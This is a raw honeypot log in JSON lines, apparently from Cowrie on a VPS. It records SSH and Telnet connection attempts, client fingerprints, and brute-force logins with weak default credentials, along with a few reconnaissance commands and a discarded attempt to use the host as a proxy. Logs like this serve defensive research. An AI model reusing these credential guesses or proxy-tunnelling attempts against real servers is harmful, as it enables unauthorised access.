{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":18254,"dst_ip":"1.2.3.4","dst_port":22,"session":"45bd44085c24","protocol":"ssh","message":"New connection: 212.227.125.160:18254 (1.2.3.4:22) [session: 45bd44085c24]","sensor":"my-vps","timestamp":"2025-08-28T22:28:13.183371Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:13.441520Z","src_ip":"212.227.125.160","session":"45bd44085c24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":18266,"dst_ip":"1.2.3.4","dst_port":22,"session":"d90ef0f27b07","protocol":"ssh","message":"New connection: 212.227.125.160:18266 (1.2.3.4:22) [session: d90ef0f27b07]","sensor":"my-vps","timestamp":"2025-08-28T22:28:14.067627Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:28:14.245827Z","src_ip":"212.227.125.160","session":"d90ef0f27b07"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:14.247164Z","src_ip":"212.227.125.160","session":"d90ef0f27b07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:28:14.768723Z","src_ip":"212.227.125.160","session":"db097e6283de"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T22:28:14.769452Z","src_ip":"212.227.125.160","session":"db097e6283de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:16.036707Z","src_ip":"212.227.125.160","session":"db097e6283de"}
{"eventid":"cowrie.session.closed","duration":"12.5","message":"Connection lost after 12.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:16.037894Z","src_ip":"212.227.125.160","session":"db097e6283de"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":33310,"dst_ip":"1.2.3.4","dst_port":22,"session":"95a6f83f0b19","protocol":"ssh","message":"New connection: 201.148.180.50:33310 (1.2.3.4:22) [session: 95a6f83f0b19]","sensor":"my-vps","timestamp":"2025-08-28T22:28:23.087363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:28:24.273955Z","src_ip":"201.148.180.50","session":"95a6f83f0b19"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:28:24.275187Z","src_ip":"201.148.180.50","session":"95a6f83f0b19"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:28:31.535033Z","src_ip":"201.148.180.50","session":"95a6f83f0b19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47106,"dst_ip":"1.2.3.4","dst_port":22,"session":"61260c4de592","protocol":"ssh","message":"New connection: 212.227.125.160:47106 (1.2.3.4:22) [session: 61260c4de592]","sensor":"my-vps","timestamp":"2025-08-28T22:28:32.520011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:28:32.521094Z","src_ip":"212.227.125.160","session":"61260c4de592"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T22:28:32.571172Z","src_ip":"212.227.125.160","session":"61260c4de592"}
{"eventid":"cowrie.login.failed","username":"solv","password":"1234","message":"login attempt [solv/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T22:28:32.724223Z","src_ip":"212.227.125.160","session":"61260c4de592"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:33.776975Z","src_ip":"212.227.125.160","session":"61260c4de592"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:28:34.793724Z","src_ip":"201.148.180.50","session":"95a6f83f0b19"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T22:28:34.794461Z","src_ip":"201.148.180.50","session":"95a6f83f0b19"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:36.201390Z","src_ip":"201.148.180.50","session":"95a6f83f0b19"}
{"eventid":"cowrie.session.closed","duration":"13.1","message":"Connection lost after 13.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:36.202510Z","src_ip":"201.148.180.50","session":"95a6f83f0b19"}
{"eventid":"cowrie.session.connect","src_ip":"82.209.249.82","src_port":34563,"dst_ip":"1.2.3.4","dst_port":23,"session":"11b5ef0d60e4","protocol":"telnet","message":"New connection: 82.209.249.82:34563 (1.2.3.4:23) [session: 11b5ef0d60e4]","sensor":"my-vps","timestamp":"2025-08-28T22:28:38.507441Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:51.482157Z","src_ip":"212.227.125.160","session":"46c1662b32a2"}
{"eventid":"cowrie.session.closed","duration":13.165145874023438,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:28:51.672515Z","src_ip":"82.209.249.82","session":"11b5ef0d60e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48794,"dst_ip":"1.2.3.4","dst_port":22,"session":"c68d395417fd","protocol":"ssh","message":"New connection: 212.227.235.229:48794 (1.2.3.4:22) [session: c68d395417fd]","sensor":"my-vps","timestamp":"2025-08-28T22:29:08.305277Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003f\\xb7z\\x9e]\\xa4\u0394\\xf2Y\\xa4S\\xe1\\xdc\\xd357\\x8b8\\xa7| \\x9a\\x96\\x8b\\xf5\u0019?P\\xd1\\xcc2\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003f\\xb7z\\x9e]\\xa4\u0394\\xf2Y\\xa4S\\xe1\\xdc\\xd357\\x8b8\\xa7| \\x9a\\x96\\x8b\\xf5\u0019?P\\xd1\\xcc2\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-28T22:29:08.306260Z","src_ip":"212.227.235.229","session":"c68d395417fd"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:08.307004Z","src_ip":"212.227.235.229","session":"c68d395417fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58128,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb6e08ceeb24","protocol":"ssh","message":"New connection: 212.227.235.229:58128 (1.2.3.4:22) [session: cb6e08ceeb24]","sensor":"my-vps","timestamp":"2025-08-28T22:29:12.587388Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:12.975606Z","src_ip":"212.227.235.229","session":"cb6e08ceeb24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58138,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f837e21b25c","protocol":"ssh","message":"New connection: 212.227.235.229:58138 (1.2.3.4:22) [session: 1f837e21b25c]","sensor":"my-vps","timestamp":"2025-08-28T22:29:13.393870Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:14.079931Z","src_ip":"212.227.235.229","session":"1f837e21b25c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58166,"dst_ip":"1.2.3.4","dst_port":22,"session":"358040309d0d","protocol":"ssh","message":"New connection: 212.227.235.229:58166 (1.2.3.4:22) [session: 358040309d0d]","sensor":"my-vps","timestamp":"2025-08-28T22:29:15.412256Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:15.784524Z","src_ip":"212.227.235.229","session":"358040309d0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58176,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ed738ffe10e","protocol":"ssh","message":"New connection: 212.227.235.229:58176 (1.2.3.4:22) [session: 1ed738ffe10e]","sensor":"my-vps","timestamp":"2025-08-28T22:29:16.658156Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:29:16.836752Z","src_ip":"212.227.235.229","session":"1ed738ffe10e"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:16.838027Z","src_ip":"212.227.235.229","session":"1ed738ffe10e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33834,"dst_ip":"1.2.3.4","dst_port":22,"session":"c42f049a995d","protocol":"ssh","message":"New connection: 212.227.235.229:33834 (1.2.3.4:22) [session: c42f049a995d]","sensor":"my-vps","timestamp":"2025-08-28T22:29:17.037029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:29:17.151986Z","src_ip":"212.227.235.229","session":"c42f049a995d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T22:29:17.261429Z","src_ip":"212.227.235.229","session":"c42f049a995d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58186,"dst_ip":"1.2.3.4","dst_port":22,"session":"114be61182de","protocol":"ssh","message":"New connection: 212.227.235.229:58186 (1.2.3.4:22) [session: 114be61182de]","sensor":"my-vps","timestamp":"2025-08-28T22:29:18.641338Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:29:18.837816Z","src_ip":"212.227.235.229","session":"114be61182de"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:18.839157Z","src_ip":"212.227.235.229","session":"114be61182de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52874,"dst_ip":"1.2.3.4","dst_port":22,"session":"32cbd30d6691","protocol":"ssh","message":"New connection: 212.227.235.229:52874 (1.2.3.4:22) [session: 32cbd30d6691]","sensor":"my-vps","timestamp":"2025-08-28T22:29:20.024885Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T22:29:20.201647Z","src_ip":"212.227.235.229","session":"32cbd30d6691"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:20.202957Z","src_ip":"212.227.235.229","session":"32cbd30d6691"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52880,"dst_ip":"1.2.3.4","dst_port":22,"session":"72c4c5fbec48","protocol":"ssh","message":"New connection: 212.227.235.229:52880 (1.2.3.4:22) [session: 72c4c5fbec48]","sensor":"my-vps","timestamp":"2025-08-28T22:29:21.597099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:29:21.598148Z","src_ip":"212.227.235.229","session":"72c4c5fbec48"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:29:21.699923Z","src_ip":"212.227.235.229","session":"72c4c5fbec48"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T22:29:22.043854Z","src_ip":"212.227.235.229","session":"72c4c5fbec48"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:23.216051Z","src_ip":"212.227.235.229","session":"72c4c5fbec48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52888,"dst_ip":"1.2.3.4","dst_port":22,"session":"780634f78ba8","protocol":"ssh","message":"New connection: 212.227.235.229:52888 (1.2.3.4:22) [session: 780634f78ba8]","sensor":"my-vps","timestamp":"2025-08-28T22:29:24.194941Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:24.428664Z","src_ip":"212.227.235.229","session":"780634f78ba8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52896,"dst_ip":"1.2.3.4","dst_port":22,"session":"016c9aa994aa","protocol":"ssh","message":"New connection: 212.227.235.229:52896 (1.2.3.4:22) [session: 016c9aa994aa]","sensor":"my-vps","timestamp":"2025-08-28T22:29:24.916197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:29:24.917054Z","src_ip":"212.227.235.229","session":"016c9aa994aa"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:29:25.020730Z","src_ip":"212.227.235.229","session":"016c9aa994aa"}
{"eventid":"cowrie.login.success","username":"root","password":"@#$%^&*!","message":"login attempt [root/@#$%^&*!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:29:25.367067Z","src_ip":"212.227.235.229","session":"016c9aa994aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"204.76.203.28","dst_port":80,"src_ip":"212.227.235.229","src_port":5555,"message":"direct-tcp connection request to 204.76.203.28:80 from 127.0.0.1:5555","sensor":"my-vps","timestamp":"2025-08-28T22:29:25.668184Z","session":"016c9aa994aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"204.76.203.28","dst_port":80,"data":"b'qPPliwOr2ng5XviYWkLyKM4ZDUeSDuKABuk0I9Co4Jp7qkO9aV'","id":0,"message":"discarded direct-tcp forward request 0 to 204.76.203.28:80 with data b'qPPliwOr2ng5XviYWkLyKM4ZDUeSDuKABuk0I9Co4Jp7qkO9aV'","sensor":"my-vps","timestamp":"2025-08-28T22:29:25.772459Z","src_ip":"212.227.235.229","session":"016c9aa994aa"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:26.119368Z","src_ip":"212.227.235.229","session":"016c9aa994aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52900,"dst_ip":"1.2.3.4","dst_port":22,"session":"28f4288ab34f","protocol":"ssh","message":"New connection: 212.227.235.229:52900 (1.2.3.4:22) [session: 28f4288ab34f]","sensor":"my-vps","timestamp":"2025-08-28T22:29:27.030929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T22:29:27.031851Z","src_ip":"212.227.235.229","session":"28f4288ab34f"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T22:29:27.128234Z","src_ip":"212.227.235.229","session":"28f4288ab34f"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:27.160393Z","src_ip":"212.227.235.229","session":"c42f049a995d"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T22:29:27.449790Z","src_ip":"212.227.235.229","session":"28f4288ab34f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:29:28.631360Z","src_ip":"212.227.235.229","session":"28f4288ab34f"}
